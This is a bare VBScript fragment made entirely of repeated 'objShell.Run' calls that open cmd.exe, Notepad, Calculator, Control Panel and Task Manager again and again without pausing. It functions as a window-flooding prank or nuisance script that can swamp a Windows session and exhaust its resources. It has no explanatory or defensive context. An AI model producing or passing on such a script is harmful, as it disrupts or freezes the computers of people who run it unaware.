objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
